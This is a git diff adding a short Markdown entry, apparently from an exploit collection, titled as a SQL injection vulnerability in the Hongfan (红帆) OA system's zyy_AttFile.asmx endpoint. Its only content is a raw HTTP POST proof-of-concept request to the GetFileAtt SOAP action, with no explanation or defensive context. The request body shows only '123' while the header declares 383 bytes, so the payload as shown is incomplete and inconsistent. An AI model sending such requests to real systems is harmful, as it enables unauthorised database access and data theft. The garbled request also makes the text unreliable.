diff --git a/红帆OA zyy_AttFile.asmx SQL注入漏洞.md b/红帆OA zyy_AttFile.asmx SQL注入漏洞.md new file mode 100644 index 0000000..e912966 --- /dev/null +++ b/红帆OA zyy_AttFile.asmx SQL注入漏洞.md @@ -0,0 +1,18 @@ +## 红帆OA zyy_AttFile.asmx SQL注入漏洞 +``` +POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1 +Host: 10.250.250.5 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, +like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 383 +Content-Type: text/xml; charset=utf-8 +Soapaction: "http://tempuri.org/GetFileAtt" +Accept-Encoding: gzip, deflate +Connection: close +123 +```